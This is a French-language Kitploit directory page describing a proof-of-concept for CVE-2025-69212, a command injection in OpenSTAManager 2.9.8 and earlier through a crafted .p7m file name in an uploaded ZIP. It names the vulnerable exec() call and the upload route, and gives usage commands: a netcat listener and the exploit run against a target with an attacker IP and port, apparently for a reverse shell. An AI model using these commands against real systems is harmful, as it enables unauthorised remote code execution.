Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69212-PoC — Preuve de concept d'exploitation pour CVE-2025-69212 : injection de commandes système dans OpenSTAManager <= 2.9.8 via un nom de fichier .p7m malveillant lors du téléversement ZIP, permettant l'exécution de code à distance. | Kitploit
Outils/GitHubGitHub/tohib09/cve-2025-69212-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

Preuve de concept d'exploitation pour CVE-2025-69212 : injection de commandes système dans OpenSTAManager <= 2.9.8 via un nom de fichier .p7m malveillant lors du téléversement ZIP, permettant l'exécution de code à distance.

Voir le dépôt
4il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69212 — PoC d'injection de commandes OpenSTAManager P7M

OpenSTAManager <= 2.9.8 — Injection de commandes système via un nom de fichier .p7m malveillant dans un téléchargement ZIP.

Fichier : src/Util/XML.php:100 — $file non assaini dans exec()
Vecteur : /plugins/importFE_ZIP/actions.php → ZIP → nom de fichier .p7m → exec("openssl smime ... -in \"$file\" ...")

Utilisation

root@kitploit:~
# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444

Références

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212

CVE-2025-69212-PoC

Télécharger l’outil